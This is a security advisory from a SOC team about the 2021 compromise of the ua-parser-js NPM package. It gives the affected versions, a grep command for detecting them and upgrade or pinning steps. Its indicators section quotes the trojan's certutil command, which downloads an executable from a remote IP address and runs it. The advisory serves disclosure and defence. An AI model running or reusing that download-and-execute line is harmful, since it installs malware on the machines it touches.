Advisory October 25, 2021

Compromised NPM packages

Obrela SOC

Supply chain attacks aim at compromising a product during its development and delivery stages of deployment. NPM (Node Package Manager) is among the largest software registries for NodeJS, which has been detected to contain several packages with malicious code inside. The latest discovery is about the “ua-parser-js” package downloading and executing a cryptominer. Given the popularity of this package, it is important to verify if it has been used during the lifecycle development or if it has spread to other machines, as it has been reported to be affecting  both Windows and Linux environments.

Affected versions

  • 0.7.29
  • 0.8.0
  • 1.0.0

Indicators of Compromise

The trojan leverages the certutil internal tool on Windows systems to download and execute the malware :”certutil.exe -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe”.

To detect the malicious versions on Linux systems use the following command:

find / -name “package-lock.json” -exec grep –color -EHni “ua-parser-js-(0.7.29|0.8.0|1.0.0)” {} \; 2>/dev/null

Mitigation

For the moment, developers cannot revoke the highjacked package, hence 2 methods are currently being suggested.

  • Set the resolutions in package.json to use the last good version: “resolutions”: { “ua-parser-js”: “0.7.28” } in your CI
  • Update to the newest packages:
    • 0.7.30
    • 0.8.1
    • 1.0.1